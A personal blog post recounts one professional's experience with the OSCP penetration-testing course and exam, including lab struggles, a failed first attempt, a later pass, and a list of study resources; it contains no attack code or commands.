
About me:
I have about 20 years of combined IT experience. I have two MCSEs, two MCSAs, MCITP:VA, VCP5, Security+, CEHv7, RHCSA, a BS in IT security, and I am finishing up my Master’s in Applied IT with a concentration in Applied Cyber Security. I currently work for Lockheed Martin as an Active Directory Engineer on a government contract.

The course:
When I first signed up for the course, I quickly went through the manual and videos that are included with the email you receive once you start the course. A lot of the information I was already familiar with, as I had to review a lot of it for the CEHv7 certification. As we all know, the OSCP exam and course are very technical and very hands-on. The CEH is pretty much all about theory and multiple-choice questions. I was glad to take a course that not only talked about tools, but about how to use them and why they are used.

So when I first started the course, I was very motivated. The very first day I was in the labs, I was able to knock out 3 servers with very minimal effort. At this point I am thinking to myself, this is too easy! That is, until I met “sufference”. Over the course of the next month or so I was able to get to about 20 servers. As I said in the beginning, I was super motivated, but as time went on I was losing interest and simply didn’t have the time.

Sufference
As I said, I thought this course was too easy at first, and I was able to knock out server after server. That is, until I met sufference. This is where I lost a lot of motivation. I believe I spent 3 weeks alone on this beast of a server. It demotivated me and made me feel like a child who just had his ice cream money stolen by Vic the bully down the street. I spent hours a day on this server alone, obsessing over it. I decided to come back to it later. So I moved on to some other challenging servers, and I was able to root them and get some of my confidence back.

I decide to go back and kick sufference right in the teeth after this. I do a lot of googling, AND I MEAN A LOT, and finally I find a way in and get a limited shell! Great! Half the battle has been won! This is not enough for me; I need to make this server my bitch and show it who’s boss. Yeah… not so much. Again I decide to regroup and move on…. maybe the answer will come to me. I pop a few more servers (at this point I am close to my 90-day mark). I HAVE TO OWN THIS BEFORE MY LAB TIME IS UP! One more attempt, I tell myself.

I finally come across something that clicks for me, and I have one of those AH-HA! moments. It’s something I should have seen sooner… but for some reason I did not, and stayed ignorant. I finally found the answer, and I was able to root sufference after nearly 3 months! My motivation and confidence have been renewed.

/sufference

I decide to extend for another 30 days. I only have about 30 servers owned at this point… and I hadn’t unlocked any of the other networks. I can do better. So I renew, and I decide my new goal is to at least get into the admin network. After a lot of time spent in the labs and researching exploits, etc., I had finally learned how to pivot into the admin network. Thank you, proxychains! I was able to get all of the servers in the IT network, and all but one in the admin network. My time was almost up in the labs, so I decided to go ahead and book the exam. I felt I was ready and could do this.

The Exam (part 1):
The exam is a 24-hour challenge. This means that you have 24 hours from the time the exam starts to try and compromise the servers assigned to you in the exam. Additionally, you have another 24 hours after that to write your report and send it in for grading. You are graded on your report alone, and you HAVE to complete this in order to pass the exam. You are also encouraged to submit a lab report documenting your efforts in the lab. You may get extra points for this should you need them on the exam. This is all explained in the exam email.

I booked my exam for a Saturday evening starting at 5pm. The email comes right at 5pm. I connect to the network, look at the exam guide that is provided, and start working. In the first hour I had managed to root 2 servers. I felt like I was on a roll, and that I was going to end this beast early. Not so much.

After the first two, I didn’t get anything on the next three servers for the next 12 hours. Nothing. Zilch, nada! I was deflated and dumbfounded. I figured I should take a nap and come back to it. Maybe I was just exhausted and needed some rest. I take a 3-hour nap and come back. This is what I needed. In the next hour or two after that, I had 2 more limited shells. I couldn’t escalate. I tried until the bitter end. At the end, I had two fully compromised hosts and 2 limited shells. Would this be enough to pass the exam?

Turns out it wasn’t. I got the email Tuesday afternoon stating I hadn’t passed.

I will NOT be defeated!

The Exam (part 2):
I decided to extend my lab time for another 15 days, and book the exam 2 weeks after I had failed. I decided to concentrate on privilege escalation, since this is what I felt I was weak at. I spent the next couple of weeks working on that as well as buffer overflows. I really didn’t do too much in the labs, except maybe a few servers I may have missed in the public network. I just really wanted to work on escalations. Turns out this was a smart move on my part.

This time I book the exam for 10AM. Again the email comes, along with the exam guide and instructions to connect in. Away I go. Again, I get the first 2 servers in the first hour. I don’t get ahead of myself and just keep plugging away. I start on the next server and it falls in the next hour. By the 5th hour I had 3 full compromises and 3 limited shells. I KNOW I have passed at this point, by the number of points I will be awarded based on the exam guide. Again… this is not enough for me. I have to prove to myself that I can TRY HARDER!

I do just that.

After 6 hours in the exam, I feel like I am done. 4 full compromises out of 5, and on the last server I had a limited shell. This should have been about 90 points. I am satisfied but tired. I was smart enough to document everything as I went, so I only had to spend another hour fixing up my report. I sent my report to the offsec team, and walked away from my computer like a boss.

OSCP Passed!


Wrap up:
This is by far the most challenging and rewarding course and certification I have ever taken. I respect anyone else who has the guts to take this on and succeed. It truly shows you know your stuff in this field.

I sent off my report Saturday evening around 4-5PM. I got the response this morning (Monday Feb 23, 2015) that I had passed the exam. I am elated that this challenge is over and I was able to overcome it. I tried harder when it mattered most and I was able to accomplish what I set out to do.

I am now an Offensive Security Certified Professional because I tried harder!

My OSCP Review

I cannot say enough good things about the OSCP course and exam. I was challenged, and I learned a whole lot more than I thought I would about security and penetration testing. I hope that the OSCP will gain more recognition by companies. The OSCP is the certification I am most proud of by far.

Time to update the old resume to reflect the new OSCP certification!


Resources:
Some resources I used for this challenge:
http://www.fuzzysecurity.com/tutorials/16.html
http://pentestmonkey.net/category/cheat-sheet/shell
https://github.com/GDSSecurity/Windows-Exploit-Suggester
https://github.com/PenturaLabs/Linux_Exploit_Suggester
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
http://www.offensive-security.com/metasploit-unleashed/Main_Page

I also read The Hacker Playbook, the Metasploit Unleashed book, and the Penetration Testing book by Georgia Weidman.

These are all very good resources.

Thanks to all those who helped me and pushed me when I needed it, especially all the other people who have written an OSCP review to help others.

More information about the OSCP and PWK can be found here:
https://www.offensive-security.com/information-security-training/penetration-testing-with-kali-linux/
https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/

Additionally the offsec admins can be contacted via IRC at irc.freenode.net #offsec

If anyone wants to talk or has any questions, feel free to connect to irc.osswg.com #oscp
I will not give any hints or answers, but I can try and answer any other questions pertaining to the OSCP. Good luck to anyone wishing to take on the OSCP course and exam. After you pass the exam, write your own OSCP review!

OSCP Challenge

I have decided to take on the OSCP (Offensive Security Certified Professional) course and exam.

I decided to tackle the OSCP exam, and make a project out of it.
This thread will be used to document my experiences with the course leading up to the exam.

Course information:
Penetration Testing with Kali

Penetration Testing with Kali Linux (PWK) is an online training course designed for network administrators and security professionals who need to acquaint themselves with the world of offensive information security. This penetration testing training introduces the latest hacking tools and techniques in the field and includes remote virtual penetration testing labs for practicing the course materials. Penetration Testing with Kali Linux attempts to simulate a full penetration test, from start to finish, by injecting the student into a rich, diverse, and vulnerable network environment.

Penetration Testing with Kali Linux is an entry-level course but still requires students to have certain knowledge prior to attending the class. A solid understanding of TCP/IP, networking, and reasonable Linux skills are required. This course is not for the faint of heart; it requires practice, testing, and the ability to want to learn in a manner that will grow your career in the information security field and defeat any learning plateau. Offensive Security challenges you to rise above the rest, dive into the fine arts of advanced penetration testing, and to Try Harder™.

Certification information:
OSCP

The Offensive Security Certified Professional (OSCP) is the world’s first completely hands on offensive information security certification. The OSCP challenges the students to prove they have a clear practical understanding of the penetration testing process and lifecycle through an arduous twenty four (24) hour certification exam.

The OSCP exam consists of a dedicated vulnerable network, which is designed to be compromised within a 24-hour time period. The exam is entirely hands-on and is completed with the examinee submitting an in-depth penetration test report of the OSCP examination network and PWK labs. The coveted OSCP certification is awarded to students who successfully gain administrative access to systems on the vulnerable network.

Completing this course will allow me to validate my knowledge, as well as learn a lot more. This will be one of the toughest courses I have ever taken.

I am positive that I can complete this challenge and conquer the exam.

I will do my best to update this fairly regularly to document my experiences and challenges while going through the course and the exam.